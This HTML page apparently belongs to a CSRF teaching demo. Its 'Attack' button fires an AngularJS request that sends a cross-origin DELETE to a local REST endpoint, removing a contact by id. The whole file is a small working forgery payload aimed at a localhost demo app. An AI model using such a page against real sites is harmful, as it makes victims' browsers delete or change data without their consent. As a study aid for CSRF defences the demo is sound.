<!DOCTYPE html>
<html ng-app="MyApp">
<head lang="en">
    <meta charset="UTF-8">
    <title>Cross Site Request Forgery Attack to Unsecured Webapp (8081) </title>
    <script src="lib/angular/angular.min.js"></script>
</head>
<body ng-controller="ContactsController">

    <input type="text" ng-model="contactId"/>
    <button ng-click="delete(contactId)">Attack</button>

    <script type="text/javascript">

        var app = angular.module("MyApp", []);

        app.controller("ContactsController", function($scope, $http) {

            $scope.contactId = 1;

            $scope.delete = function(contactId){
                $http.delete('http://localhost:8080/rest/contact', { params: { id: contactId } }).
                        success(function() {
                            console.log('Successfully deleted contact.');
                        }).
                        error(function(data) {
                            console.log(data);
                        });
            }

        });
    </script>

</body>
</html>